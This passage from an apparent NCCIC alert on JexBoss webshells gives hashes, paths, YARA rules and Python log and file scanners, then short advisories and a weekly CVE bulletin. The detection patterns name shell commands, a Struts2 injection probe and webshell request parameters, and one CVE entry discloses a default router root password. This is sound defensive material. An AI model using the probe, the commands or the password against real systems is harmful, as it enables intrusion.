    If the target web server is induced to download the .war file from joaomatosf[.]com (see the Webshell Installation section), the web server will retrieve the latest version of the webshell (currently version 4). NCCIC's examination of the public files hosted on joaomatosf[.]com revealed the presence of the .war files listed in table 7.

    Table 7: JexBoss webshells listed on joaomatosf[.]com

    Filename | Webshell Version | Size (bytes) | MD5 Checksum
    jbossass.war | 4 | 1452 | 8db88d5d46aa503a697a6940aa10a574
    jexws.war | 4 | 1446 | bb8d176207045ff70470c511271f56d9
    jexws2.war | 4 | 1448 | 13062a85ed1f5c3f4878ff3950a8e222
    jexws3.war | 4 | 1448 | f2af83ed4cac1d2c68f82bd8450c7428
    jexws4.war | 4 | 1448 | a15bf7dd4169069c70ba2f4ee1c62b03

    The .jsp files within the .war files in tables 6 and 7 are listed in table 8.

    Table 8: JexBoss .jsp files

    Filename | Webshell Version | Size (bytes) | MD5 Checksum
    jbossass.jsp | 1 | 378 | 3cd75a261debd9fb2b16368266fba778
    jexws.jsp | 2 | 1812 | e7d94e998f1ec8beb8f33e56607c45f9
    jexws.jsp | 4 | 2201 | acda46759d7c3526df2a6c59803586a4

    Once the .war file is successfully uploaded to the victim web server, JBoss handles the file as if it were a legitimate web application. In the test environment, NCCIC found the original .war and the unzipped .jsp files in a temporary location (/opt/jboss-6.1.0.Final/server/default/tmp), while the contents of the .jsp file were wrapped in a platform-specific class and written to a new file. The contents of the .jsp file were then installed by JBoss in the following location:

    /opt/jboss-6.1.0.Final/server/default/work/jboss.web/localhost/jexws4/org/apache/jsp/jexws4_jsp.java

    Advanced users of JexBoss can change the names of the webshell files, make minor modifications so that the MD5 checksum differs from those listed in this report, or completely change this webshell to circumvent the methods of detection that focus on the presence of the specific files listed in this report. However, network defenders may still benefit from frequently reviewing web servers for the presence of unwanted files and URIs served by their web server, which may indicate the presence of a webshell or other malware.

    Network defenders should carefully examine their organization's web server logs for indications of malicious web requests, specifically to identify requests that contain OS commands, such as

    • /bin/bash or uname -a in Linux, or
    • cmd.exe or net commands in Windows.
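    The table 5 signatures, the behavior-analysis checklist above (unusual webshell URIs, OS commands embedded in query parameters, header values and POST data) and the OS-command list just given can be re-expressed as one defender-side checker. The following is an added example written for this page, not NCCIC's code or tooling; the request dictionaries, the function names, the inclusion of /bin/sh alongside /bin/bash, and the specific `net` subcommands it looks for are assumptions made for the example. The sample requests are constructed, not captured traffic.

```python
"""Flag HTTP requests that carry the JexBoss indicators described in this alert."""
import re
from urllib.parse import unquote_plus

# Indicators quoted from the alert (table 5 rules 2 and 3, and the OS-command list).
JEXBOSS_USER_AGENT = "jexboss"
STRUTS_PROBE = "(#giftarray=(#isnix?{'/bin/bash','-c',#gift}:{'cmd.exe','/c',#gift}))"
WEBSHELL_URI = re.compile(r"/(jexws\d*|jbossass)\.jsp", re.IGNORECASE)

# Coarse OS-command patterns built from the alert's examples. Matching /bin/sh as
# well as /bin/bash, and the particular `net` subcommands, are assumptions.
OS_COMMANDS = [
    ("linux_shell", re.compile(r"/bin/(ba)?sh\b")),
    ("linux_uname", re.compile(r"\buname\s+-a\b")),
    ("windows_cmd", re.compile(r"\bcmd\.exe\b", re.IGNORECASE)),
    ("windows_net", re.compile(r"\bnet\s+(user|group|localgroup|use|view|share)\b", re.IGNORECASE)),
]


def _text_fields(req):
    """Yield (location, URL-decoded text) for each place the alert says to look:
    the request URI with its query string, every header value, and the POST body."""
    yield "uri", unquote_plus(req["uri"])
    for name, value in req.get("headers", {}).items():
        yield f"header:{name}", unquote_plus(value)
    if req.get("body"):
        yield "body", unquote_plus(req["body"])


def analyze_request(req):
    """Return the sorted list of indicator names one request triggers (empty if clean)."""
    hits = set()
    user_agent = req.get("headers", {}).get("User-Agent", "")
    if JEXBOSS_USER_AGENT in user_agent.lower():
        hits.add("jexboss_user_agent")      # table 5, rule 3 (webshell version 1)
    if WEBSHELL_URI.search(req["uri"]):
        hits.add("webshell_uri")            # unusual URI, e.g. jexws4/jexws4.jsp
    for location, text in _text_fields(req):
        if STRUTS_PROBE in text:
            hits.add("struts2_probe")       # table 5, rule 2 (CVE-2017-5638)
        for name, pattern in OS_COMMANDS:
            if pattern.search(text):
                hits.add(f"os_command:{name}@{location}")
    return sorted(hits)


def scan(requests):
    """Map request id -> indicators for every request that triggered at least one."""
    results = {}
    for req in requests:
        hits = analyze_request(req)
        if hits:
            results[req["id"]] = hits
    return results


# Constructed sample traffic: one benign request and three carrying the indicators.
SAMPLE_REQUESTS = [
    {"id": 1, "uri": "/index.html",
     "headers": {"User-Agent": "Mozilla/5.0", "Host": "www.example.org"}},
    {"id": 2, "uri": "/jexws4/jexws4.jsp?ppp=uname+-a",
     "headers": {"User-Agent": "jexboss", "Host": "www.example.org"}},
    {"id": 3, "uri": "/struts2-showcase/",
     "headers": {"User-Agent": "Mozilla/5.0", "Content-Type": STRUTS_PROBE}},
    {"id": 4, "uri": "/login",
     "headers": {"User-Agent": "Mozilla/5.0"},
     "body": "user=alice&cmd=cmd.exe+%2Fc+net+user"},
]

if __name__ == "__main__":
    for req_id, hits in sorted(scan(SAMPLE_REQUESTS).items()):
        print(req_id, ", ".join(hits))
```

    Each finding names both the indicator and where in the request it was seen, which is what an analyst needs to decide whether the request was a probe (the Struts string in a header), a webshell interaction (the jexws4.jsp URI with a command in its parameter), or plain command injection in a POST body. The URL-decoding step matters: the `uname+-a` and `%2Fc` forms would be missed by a literal match on the raw line.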

    Forensic analysts can use the YARA rules provided in figure 17 to search their web server file system for the presence of JexBoss webshell files. These general YARA rules may work better than file hashes for alerting on webshell files to which attackers have made small changes in order to evade detection. These general YARA rules will not detect other custom webshells or heavily modified JexBoss webshells.

    rule jexboss_war: webshell
    {
        meta:
            description = "JexBoss WAR File"
        strings:
            $magic = { 50 4b 03 04 ( 14 | 0a ) 00 }
            $string_1 = "jexws"
            $string_2 = "jbossass"
            $jsp_ext = ".jsp"
        condition:
            $magic at 0 and 1 of ($string_*) and $jsp_ext
    }
    rule jexboss_jsp: webshell
    {
        meta:
            description = "JexBoss JSP file"
        strings:
            $string_1 = "getParameter(\"ppp\")"
            $string_2 = "jexboss" nocase
            $string_3 = "getRuntime().exec("
        condition:
            all of ($string_*)
    }

    Figure 17: JexBoss webshell YARA rules
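    The hash lookup from tables 6 through 8, the figure 17 YARA rules and the caveat about renamed or lightly edited files can be combined into one file-system sweep. The following is an added example written for this page, not NCCIC's tooling and not a substitute for running YARA itself: it re-expresses the two rules in Python, compares MD5 checksums against the tables, and looks inside every ZIP archive for a matching .jsp member so that a renamed .war is still caught. The directory layout is constructed in a temporary directory, and the fixture JSP carries the indicator strings only inside comments; it is not webshell code. Function names are assumptions.

```python
"""Sweep a web server file tree for JexBoss webshell artifacts (hashes plus rule logic)."""
import hashlib
import os
import tempfile
import zipfile

# MD5 checksums from tables 6, 7 and 8 of the alert.
KNOWN_MD5 = {
    "cbdeaf83f58a64b09df58b94063e0146": "jbossass.war (webshell v1)",
    "3f156bd68b2a32a1b5cb03af318667f0": "jexws.war / jbossas.war (webshell v2)",
    "8db88d5d46aa503a697a6940aa10a574": "jbossass.war (webshell v4)",
    "bb8d176207045ff70470c511271f56d9": "jexws.war (webshell v4)",
    "13062a85ed1f5c3f4878ff3950a8e222": "jexws2.war (webshell v4)",
    "f2af83ed4cac1d2c68f82bd8450c7428": "jexws3.war (webshell v4)",
    "a15bf7dd4169069c70ba2f4ee1c62b03": "jexws4.war (webshell v4)",
    "3cd75a261debd9fb2b16368266fba778": "jbossass.jsp (webshell v1)",
    "e7d94e998f1ec8beb8f33e56607c45f9": "jexws.jsp (webshell v2)",
    "acda46759d7c3526df2a6c59803586a4": "jexws.jsp (webshell v4)",
}


def md5_hex(data):
    return hashlib.md5(data).hexdigest()


def looks_like_jexboss_war(data):
    """Python rendering of the jexboss_war YARA rule: ZIP local-file header with
    version byte 0x14 or 0x0a at offset 0, one of the webshell names, and ".jsp"."""
    magic_ok = data[:4] == b"PK\x03\x04" and data[4:6] in (b"\x14\x00", b"\x0a\x00")
    return magic_ok and (b"jexws" in data or b"jbossass" in data) and b".jsp" in data


def looks_like_jexboss_jsp(data):
    """Python rendering of the jexboss_jsp YARA rule (all three strings, "jexboss" nocase)."""
    return (b'getParameter("ppp")' in data
            and b"jexboss" in data.lower()
            and b"getRuntime().exec(" in data)


def scan_tree(root):
    """Return sorted (relative path, finding kind, detail) tuples for files under root."""
    findings = []
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            with open(path, "rb") as fh:
                data = fh.read()
            digest = md5_hex(data)
            if digest in KNOWN_MD5:
                findings.append((rel, "known_hash", KNOWN_MD5[digest]))
            elif name.endswith(".war") and looks_like_jexboss_war(data):
                findings.append((rel, "yara_war_match", digest))
            elif name.endswith(".jsp") and looks_like_jexboss_jsp(data):
                findings.append((rel, "yara_jsp_match", digest))
            # A renamed or lightly edited archive defeats the name and hash checks,
            # so inspect the .jsp members of every ZIP file regardless of its name.
            if zipfile.is_zipfile(path):
                with zipfile.ZipFile(path) as zf:
                    for member in zf.namelist():
                        body = zf.read(member) if member.endswith(".jsp") else b""
                        if body and looks_like_jexboss_jsp(body):
                            findings.append((f"{rel}!{member}", "yara_jsp_match", md5_hex(body)))
    return sorted(findings)


# Constructed fixtures: an inert JSP-looking file whose indicator strings sit in
# comments only, and a benign page. Neither is real webshell code.
JSP_FIXTURE = (b"<%-- constructed test fixture for the scanner --%>\n"
               b"<%-- markers: JexBoss getParameter(\"ppp\") getRuntime().exec( --%>\n")
BENIGN_JSP = b"<html><body>Hello</body></html>\n"


def build_sample_tree(root):
    """Lay out a small fake JBoss deploy/work/static tree under root (constructed)."""
    for sub in ("deploy", "work", "static"):
        os.makedirs(os.path.join(root, sub))

    def write_war(path, member, body):
        with zipfile.ZipFile(path, "w", zipfile.ZIP_DEFLATED) as zf:
            zf.writestr(member, body)

    write_war(os.path.join(root, "deploy", "jexws4.war"), "jexws4.jsp", JSP_FIXTURE)
    write_war(os.path.join(root, "deploy", "renamed.war"), "index.jsp", JSP_FIXTURE)
    write_war(os.path.join(root, "static", "app.war"), "hello.jsp", BENIGN_JSP)
    with open(os.path.join(root, "work", "jexws4.jsp"), "wb") as fh:
        fh.write(JSP_FIXTURE)


def demo():
    """Build the sample tree in a temporary directory and scan it."""
    with tempfile.TemporaryDirectory() as root:
        build_sample_tree(root)
        return scan_tree(root)


if __name__ == "__main__":
    for rel, kind, detail in demo():
        print(f"{kind:15} {rel}  ({detail})")
```

    The renamed.war fixture shows why the archive-member check is worth the extra I/O: its file name carries none of the strings the WAR rule looks for, so the rule and the hash table both miss it, but the .jsp inside still matches the JSP rule. On a real server the same sweep would be pointed at the deploy, tmp and work directories named in the text.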

    Revisions

    • November 8, 2018: Initial version



  • Original release date: November 07, 2018

    Cisco has released security updates to address vulnerabilities affecting Cisco products. An attacker could exploit some of these vulnerabilities to take control of an affected system.

    NCCIC encourages users and administrators to review the following Cisco Security Advisories and apply the necessary updates:




  • Original release date: November 06, 2018

    NCCIC is aware of reports of vulnerabilities in the hardware encryption of certain self-encrypting solid-state drives. An attacker could exploit these vulnerabilities to obtain access to sensitive information.

    NCCIC encourages users and administrators to review Vulnerability Note VU# 395981, Microsoft's Security Advisory ADV180028, and Samsung's Customer Notice regarding Samsung SSDs for more information and refer to vendors for appropriate patches and recommendations, when available.




  • Original release date: November 05, 2018

    The Apache Software Foundation has released an advisory to address a vulnerable commons-fileupload library used in Apache Struts versions 2.3.36 and prior. A remote attacker could exploit this vulnerability to take control of an affected system. Struts versions from 2.5.12 onward are not affected.

    NCCIC encourages users and administrators of Apache Struts versions 2.3.36 and prior to review the Apache security advisory for CVE-2016-1000031 and upgrade to the latest released version of Commons FileUpload library, which is currently 1.3.3.




  • Original release date: November 05, 2018

    The US-CERT Cyber Security Bulletin provides a summary of new vulnerabilities that have been recorded by the National Institute of Standards and Technology (NIST) National Vulnerability Database (NVD) in the past week. The NVD is sponsored by the Department of Homeland Security (DHS) National Cybersecurity and Communications Integration Center (NCCIC) / United States Computer Emergency Readiness Team (US-CERT). For modified or updated entries, please visit the NVD, which contains historical vulnerability information.

    The vulnerabilities are based on the CVE vulnerability naming standard and are organized according to severity, determined by the Common Vulnerability Scoring System (CVSS) standard. The division into high, medium, and low severities corresponds to the following scores:

    • High - Vulnerabilities will be labeled High severity if they have a CVSS base score of 7.0 - 10.0

    • Medium - Vulnerabilities will be labeled Medium severity if they have a CVSS base score of 4.0 - 6.9

    • Low - Vulnerabilities will be labeled Low severity if they have a CVSS base score of 0.0 - 3.9

    Entries may include additional information provided by organizations and efforts sponsored by US-CERT. This information may include identifying information, values, definitions, and related links. Patch information is provided when available. Please note that some of the information in the bulletins is compiled from external, open source reports and is not a direct result of US-CERT analysis.

    The NCCIC Weekly Vulnerability Summary Bulletin is created using information from the National Institute of Standards and Technology (NIST) National Vulnerability Database (NVD). In some cases, the vulnerabilities in the Bulletin may not yet have assigned CVSS scores. Please visit NVD for updated vulnerability entries, which include CVSS scores once they are available.

    High Vulnerabilities

    Primary Vendor -- Product | Description | Published | CVSS Score | Source & Patch Info
    There were no high vulnerabilities recorded this week.

    Medium Vulnerabilities

    Primary Vendor -- Product | Description | Published | CVSS Score | Source & Patch Info
    There were no medium vulnerabilities recorded this week.

    Low Vulnerabilities

    Primary Vendor -- Product | Description | Published | CVSS Score | Source & Patch Info
    There were no low vulnerabilities recorded this week.

    Severity Not Yet Assigned

    Primary Vendor -- Product | Description | Published | CVSS Score | Source & Patch Info

    acme_labs -- mini_httpd
      ACME mini_httpd before 1.30 lets remote users read arbitrary files.
      Published: 2018-10-29 | CVSS Score: not yet calculated | CVE-2018-18778 | Sources: MISC

    advantech -- webaccess
      WADashboard API in Advantech WebAccess 8.3.1 and 8.3.2 allows remote authenticated attackers to read any file on the filesystem due to a directory traversal vulnerability in the readFile API.
      Published: 2018-10-31 | CVSS Score: not yet calculated | CVE-2018-15706 | Sources: MISC

    advantech -- webaccess
      WebAccess Versions 8.3.2 and prior. The application fails to properly validate the length of user-supplied data, causing a buffer overflow condition that allows for arbitrary remote code execution.
      Published: 2018-10-29 | CVSS Score: not yet calculated | CVE-2018-17910 | Sources: BID, SECTRACK, MISC

    advantech -- webaccess
      Advantech WebAccess 8.3.1 and 8.3.2 are vulnerable to cross-site scripting in the Bwmainleft.asp page. An attacker could leverage this vulnerability to disclose credentials amongst other things.
      Published: 2018-10-31 | CVSS Score: not yet calculated | CVE-2018-15707 | Sources: MISC

    advantech -- webaccess
      WebAccess Versions 8.3.2 and prior. During installation, the application installer disables user access control and does not re-enable it after the installation is complete. This could allow an attacker to run elevated arbitrary code.
      Published: 2018-10-29 | CVSS Score: not yet calculated | CVE-2018-17908 | Sources: BID, SECTRACK, MISC

    advantech -- webaccess
      WADashboard API in Advantech WebAccess 8.3.1 and 8.3.2 allows remote authenticated attackers to write or overwrite any file on the filesystem due to a directory traversal vulnerability in the writeFile API. An attacker can use this vulnerability to remotely execute arbitrary code.
      Published: 2018-10-31 | CVSS Score: not yet calculated | CVE-2018-15705 | Sources: MISC

    apache -- web_server
      The Apache Web Server (httpd) specific code that normalised the requested path before matching it to the URI-worker map in Apache Tomcat JK (mod_jk) Connector 1.2.0 to 1.2.44 did not handle some edge cases correctly. If only a sub-set of the URLs supported by Tomcat were exposed via httpd, then it was possible for a specially constructed request to expose application functionality through the reverse proxy that was not intended for clients accessing the application via the reverse proxy. It was also possible in some configurations for a specially constructed request to bypass the access controls configured in httpd. While there is some overlap between this issue and CVE-2018-1323, they are not identical.
      Published: 2018-10-31 | CVSS Score: not yet calculated | CVE-2018-11759 | Sources: MISC

    apex-publish-static-files -- apex-publish-static-files
      A command injection vulnerability in the apex-publish-static-files npm module version <2.0.1 which allows arbitrary shell command execution through a maliciously crafted argument.
      Published: 2018-10-30 | CVSS Score: not yet calculated | CVE-2018-16462 | Sources: MISC

    artifex -- mupdf
      There is an out-of-bounds read in fz_run_t3_glyph in fitz/font.c in Artifex MuPDF 1.14.0, as demonstrated by mutool.
      Published: 2018-10-26 | CVSS Score: not yet calculated | CVE-2018-18662 | Sources: BID, MISC, MISC

    asrock -- drivers
      The AsrDrv101.sys and AsrDrv102.sys low-level drivers in ASRock RGBLED before v1.0.35.1, A-Tuning before v3.0.210, F-Stream before v3.0.210, and RestartToUEFI before v1.0.6.2 expose functionality to read and write Machine Specific Registers (MSRs). This could be leveraged to execute arbitrary ring-0 code.
      Published: 2018-10-30 | CVSS Score: not yet calculated | CVE-2018-10711 | Sources: EXPLOIT-DB, MISC

    asrock -- drivers
      The AsrDrv101.sys and AsrDrv102.sys low-level drivers in ASRock RGBLED before v1.0.35.1, A-Tuning before v3.0.210, F-Stream before v3.0.210, and RestartToUEFI before v1.0.6.2 expose functionality to read/write data from/to IO ports. This could be leveraged in a number of ways to ultimately run code with elevated privileges.
      Published: 2018-10-30 | CVSS Score: not yet calculated | CVE-2018-10712 | Sources: EXPLOIT-DB, MISC

    asrock -- drivers
      The AsrDrv101.sys and AsrDrv102.sys low-level drivers in ASRock RGBLED before v1.0.35.1, A-Tuning before v3.0.210, F-Stream before v3.0.210, and RestartToUEFI before v1.0.6.2 expose functionality to read and write CR register values. This could be leveraged in a number of ways to ultimately run code with elevated privileges.
      Published: 2018-10-30 | CVSS Score: not yet calculated | CVE-2018-10709 | Sources: EXPLOIT-DB, MISC

    asrock -- drivers
      The AsrDrv101.sys and AsrDrv102.sys low-level drivers in ASRock RGBLED before v1.0.35.1, A-Tuning before v3.0.210, F-Stream before v3.0.210, and RestartToUEFI before v1.0.6.2 expose functionality to read and write arbitrary physical memory. This could be leveraged by a local attacker to elevate privileges.
      Published: 2018-10-30 | CVSS Score: not yet calculated | CVE-2018-10710 | Sources: EXPLOIT-DB, MISC

    bitdefender -- gravityzone_vmware
      Bitdefender GravityZone VMware appliance before 6.2.1-35 might allow attackers to gain access with root privileges via unspecified vectors.
      Published: 2018-10-30 | CVSS Score: not yet calculated | CVE-2017-8931 | Sources: CONFIRM

    catfish -- cms
      A CSRF issue was discovered in admin/Index/tiquan in catfish blog 2.0.33.
      Published: 2018-10-29 | CVSS Score: not yet calculated | CVE-2018-18735 | Sources: MISC

    catfish -- cms
      An XSS issue was discovered in catfish blog 2.0.33, related to "write source code."
      Published: 2018-10-29 | CVSS Score: not yet calculated | CVE-2018-18736 | Sources: MISC

    catfish -- cms
      A CSRF issue was discovered in admin/Index/addmanageuser.html in Catfish CMS 4.8.30.
      Published: 2018-10-29 | CVSS Score: not yet calculated | CVE-2018-18734 | Sources: MISC

    catfish -- cms
      An XSS issue was discovered in Catfish CMS 4.8.30, related to "write source code," a similar issue to CVE-2018-13999.
      Published: 2018-10-29 | CVSS Score: not yet calculated | CVE-2018-18733 | Sources: MISC

    cesanta -- mongoose
      An exploitable arbitrary memory read vulnerability exists in the MQTT packet-parsing functionality of Cesanta Mongoose 6.13. It is a heap-based buffer over-read in mg_mqtt_next_subscribe_topic. A specially crafted MQTT SUBSCRIBE packet can cause an arbitrary out-of-bounds memory read potentially resulting in information disclosure and denial of service. An attacker needs to send a specially crafted MQTT packet over the network to trigger this vulnerability.
      Published: 2018-10-29 | CVSS Score: not yet calculated | CVE-2018-18765 | Sources: MISC

    cesanta -- mongoose
      An exploitable arbitrary memory read vulnerability exists in the MQTT packet-parsing functionality of Cesanta Mongoose 6.13. It is a heap-based buffer over-read in a parse_mqtt getu16 call. A specially crafted MQTT SUBSCRIBE packet can cause an arbitrary out-of-bounds memory read potentially resulting in information disclosure and denial of service. An attacker needs to send a specially crafted MQTT packet over the network to trigger this vulnerability.
      Published: 2018-10-29 | CVSS Score: not yet calculated | CVE-2018-18764 | Sources: MISC, MISC

    circontrol -- circarlife
      Circontrol CirCarLife all versions prior to 4.3.1, the PAP credentials of the device are stored in clear text in a log file that is accessible without authentication.
      Published: 2018-11-02 | CVSS Score: not yet calculated | CVE-2018-17922 | Sources: MISC

    circontrol -- circarlife
      Circontrol CirCarLife all versions prior to 4.3.1, authentication to the device can be bypassed by entering the URL of a specific page.
      Published: 2018-11-02 | CVSS Score: not yet calculated | CVE-2018-17918 | Sources: MISC

    cisco -- adaptive_security_appliance_and_firepower_threat_defense_software
      A vulnerability in the Session Initiation Protocol (SIP) inspection engine of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to cause an affected device to reload or trigger high CPU, resulting in a denial of service (DoS) condition. The vulnerability is due to improper handling of SIP traffic. An attacker could exploit this vulnerability by sending SIP requests designed to specifically trigger this issue at a high rate across an affected device. Software updates that address this vulnerability are not yet available.
      Published: 2018-11-01 | CVSS Score: not yet calculated | CVE-2018-15454 | Sources: BID, CISCO

    clarkgrubb -- data-tools
      data-tools through 2017-07-26 has an Integer Overflow leading to an incorrect end value for the write_wchars function.
      Published: 2018-10-29 | CVSS Score: not yet calculated | CVE-2018-18749 | Sources: MISC

    curl -- curl
      Curl versions 7.14.1 through 7.61.1 are vulnerable to a heap-based buffer over-read in the tool_msgs.c:voutf() function that may result in information exposure and denial of service.
      Published: 2018-10-31 | CVSS Score: not yet calculated | CVE-2018-16842 | Sources: SECTRACK, CONFIRM, MISC, CONFIRM, UBUNTU, UBUNTU, DEBIAN

    curl -- curl
      A heap use-after-free flaw was found in curl versions from 7.59.0 through 7.61.1 in the code related to closing an easy handle. When closing and cleaning up an 'easy' handle in the `Curl_close()` function, the library code first frees a struct (without nulling the pointer) and might then subsequently erroneously write to a struct field within that already freed struct.
      Published: 2018-10-31 | CVSS Score: not yet calculated | CVE-2018-16840 | Sources: SECTRACK, CONFIRM, MISC, CONFIRM, UBUNTU

    curl -- curl
      Curl versions 7.33.0 through 7.61.1 are vulnerable to a buffer overrun in the SASL authentication code that may lead to denial of service.
      Published: 2018-10-31 | CVSS Score: not yet calculated | CVE-2018-16839 | Sources: SECTRACK, CONFIRM, MISC, CONFIRM, UBUNTU, DEBIAN

    dedecms -- dedecms
      DedeCMS 5.7 SP2 allows XSS via the /member/uploads_select.php f or keyword parameter.
      Published: 2018-10-29 | CVSS Score: not yet calculated | CVE-2018-18781 | Sources: MISC

    dedecms -- dedecms
      Reflected XSS exists in DedeCMS 5.7 SP2 via the /member/myfriend.php ftype parameter.
      Published: 2018-10-29 | CVSS Score: not yet calculated | CVE-2018-18782 | Sources: MISC

    dell_emc -- integrated_data_protection_appliance
      Integrated Data Protection Appliance versions 2.0, 2.1, and 2.2 contain undocumented accounts named 'support' and 'admin' that are protected with default passwords. These accounts have limited privileges and can access certain system files only. A malicious user with the knowledge of the default passwords may potentially log in to the system and gain read and write access to certain system files.
      Published: 2018-11-02 | CVSS Score: not yet calculated | CVE-2018-11062 | Sources: BID, FULLDISC

    dkcms -- dkcms
      admin/check.asp in DKCMS 9.4 allows SQL Injection via an ASPSESSIONID cookie to admin/admin.asp.
      Published: 2018-10-30 | CVSS Score: not yet calculated | CVE-2018-18832 | Sources: MISC, MISC

    doccms_2016 -- doccms_2016
      upload_template() in system/changeskin.php in DocCms 2016.5.12 allows remote attackers to execute arbitrary PHP code via a template file.
      Published: 2018-10-30 | CVSS Score: not yet calculated | CVE-2018-18835 | Sources: MISC

    douchat -- douchat
      An XXE issue was discovered in Douchat 4.0.4 because Data\notify.php calls simplexml_load_string. This can also be used for SSRF.
      Published: 2018-10-29 | CVSS Score: not yet calculated | CVE-2018-18737 | Sources: MISC

    ee -- 4gee_hh70_router
      An issue was discovered on EE 4GEE HH70VB-2BE8GB3 HH70_E1_02.00_19 devices. Hardcoded root SSH credentials were discovered to be stored within the "core_app" binary utilised by the EE router for networking services. An attacker with knowledge of the default password (oelinux123) could login to the router via SSH as the root user, which could allow for the loss of confidentiality, integrity, and availability of the system. This would also allow for the bypass of the "AP Isolation" mode that is supported by the router, as well as the settings for multiple Wireless networks, which a user may use for guest clients.
      Published: 2018-10-30 | CVSS Score: not yet calculated | CVE-2018-10532 | Sources: MISC, MISC

    eleanor -- cms
      An issue was discovered in Eleanor CMS through 2015-03-19. XSS exists via the ajax.php?direct=admin&file=autocomplete&query=[XSS] URI.
      Published: 2018-10-29 | CVSS Score: not yet calculated | CVE-2018-18717 | Sources: MISC

    empirecms -- empirecms
      EmpireCMS V7.5 allows remote attackers to upload and execute arbitrary code via ..%2F directory traversal in a .php filename in the upload/e/admin/ecmscom.php path parameter.
      Published: 2018-10-31 | CVSS Score: not yet calculated | CVE-2018-18869 | Sources: MISC

    exiv2 -- exiv2
      There is an infinite loop in the Exiv2::Image::printIFDStructure function of image.cpp in Exiv2 0.27-RC1. A crafted input will lead to a remote denial of service attack.
      Published: 2018-11-03 | CVSS Score: not yet calculated | CVE-2018-18915 | Sources: MISC

    f5 -- big-ip
      On BIG-IP 14.0.0-14.0.0.2, 13.0.0-13.1.1.1, or 12.1.0-12.1.3.6, malicious requests made to virtual servers with an HTTP profile can cause the TMM to restart. The issue is exposed with the non-default "normalize URI" configuration options used in iRules and/or BIG-IP LTM policies.
      Published: 2018-10-31 | CVSS Score: not yet calculated | CVE-2018-15319 | Sources: CONFIRM

    f5 -- big-ip
      On BIG-IP 14.0.0-14.0.0.2 or 13.0.0-13.1.1.1, in certain circumstances, when processing traffic through a Virtual Server with an associated MQTT profile, the TMM process may produce a core file and take the configured HA action.
      Published: 2018-10-31 | CVSS Score: not yet calculated | CVE-2018-15323 | Sources: CONFIRM

    f5 -- big-ip
      In BIG-IP 14.0.0-14.0.0.2 or 13.0.0-13.1.1.1, iControl and TMSH usage by authenticated users may leak a small amount of memory when executing commands.
      Published: 2018-10-31 | CVSS Score: not yet calculated | CVE-2018-15325 | Sources: CONFIRM

    f5 -- big-ip
      On BIG-IP 14.0.0-14.0.0.2 or 13.0.0-13.1.1.1, undisclosed traffic patterns may lead to denial of service conditions for the BIG-IP system. The configuration which exposes this condition is the BIG-IP self IP address which is part of a VLAN group and has the Port Lockdown setting configured with anything other than "allow-all".
      Published: 2018-10-31 | CVSS Score: not yet calculated | CVE-2018-15320 | Sources: CONFIRM

    f5 -- big-ip
      In BIG-IP 14.0.0-14.0.0.2, 13.1.0.4-13.1.1.1, or 12.1.3.4-12.1.3.6, if an MPTCP connection receives a HUDCTL_ABORT while the initial flow is not the primary flow, the initial flow will remain after the MP_FASTCLOSE procedure is complete. TMM may restart and produce a core file as a result of this condition.
      Published: 2018-10-31 | CVSS Score: not yet calculated | CVE-2018-15318 | Sources: CONFIRM

    f5 -- big-ip_and_enterprise_manager
      In BIG-IP 14.0.0-14.0.0.2 or 13.0.0-13.1.1.1 or Enterprise Manager 3.1.1, when authenticated administrative users run commands in the Traffic Management User Interface (TMUI), also referred to as the BIG-IP Configuration utility, restrictions on allowed commands may not be enforced.
      Published: 2018-10-31 | CVSS Score: not yet calculated | CVE-2018-15327 | Sources: CONFIRM

    f5 -- big-ip_apm
      On BIG-IP APM 14.0.0-14.0.0.2 or 13.0.0-13.1.1.1, TMM may restart when processing a specially crafted request with APM portal access.
      Published: 2018-10-31 | CVSS Score: not yet calculated | CVE-2018-15324 | Sources: CONFIRM

    f5 -- big-ip_apm
      In some situations on BIG-IP APM 14.0.0-14.0.0.2, 13.0.0-13.1.0.7, 12.1.0-12.1.3.5, or 11.6.0-11.6.3.2, the CRLDP Auth access policy agent may treat revoked certificates as valid when the BIG-IP APM system fails to download a new Certificate Revocation List.
      Published: 2018-10-31 | CVSS Score: not yet calculated | CVE-2018-15326 | Sources: CONFIRM

    f5 -- big-ip
      In BIG-IP 14.0.0-14.0.0.2, 13.0.0-13.1.0.7, 12.1.0-12.1.3.5, 11.6.0-11.6.3.2, or 11.2.1-11.5.6, an attacker sending specially crafted SSL records to a SSL Virtual Server will cause corruption in the SSL data structures leading to intermittent decrypt BAD_RECORD_MAC errors. Clients will be unable to access the application load balanced by a virtual server with an SSL profile until tmm is restarted.
      Published: 2018-10-31 | CVSS Score: not yet calculated | CVE-2018-15317 | Sources: CONFIRM

    f5 -- multiple_products
      When BIG-IP 14.0.0-14.0.0.2, 13.0.0-13.1.0.5, 12.1.0-12.1.3.5, 11.6.0-11.6.3.2, or 11.2.1-11.5.6, BIG-IQ Centralized Management 5.0.0-5.4.0 or 4.6.0, BIG-IQ Cloud and Orchestration 1.0.0, iWorkflow 2.1.0-2.3.0, or Enterprise Manager 3.1.1 is licensed for Appliance Mode, Admin and Resource administrator roles can by-pass BIG-IP Appliance Mode restrictions to overwrite critical system files. Attackers of high privilege level are able to overwrite critical system files which bypasses security controls in place to limit TMSH commands. This is possible with an administrator or resource administrator roles when granted TMSH. Resource administrator roles must have TMSH access in order to perform this attack.
      Published: 2018-10-31 | CVSS Score: not yet calculated | CVE-2018-15321 | Sources: CONFIRM

    f5 -- multiple_products
      On BIG-IP 14.0.0-14.0.0.2, 13.0.0-13.1.0.7, 12.1.0-12.1.3.5, 11.6.0-11.6.3.2, or 11.2.1-11.5.6, BIG-IQ Centralized Management 6.0.0-6.0.1, 5.0.0-5.4.0 or 4.6.0, BIG-IQ Cloud and Orchestration 1.0.0, iWorkflow 2.0.1-2.3.0, or Enterprise Manager 3.1.1 a BIG-IP user granted with tmsh access may cause the BIG-IP system to experience denial-of-service (DoS) when the BIG-IP user uses the tmsh utility to run the edit cli preference command and proceeds to save the changes to another filename repeatedly. This action utilises storage space on the /var partition and when performed repeatedly causes the /var partition to be full.
      Published: 2018-10-31 | CVSS Score: not yet calculated | CVE-2018-15322 | Sources: CONFIRM

    foxit -- phantompdf
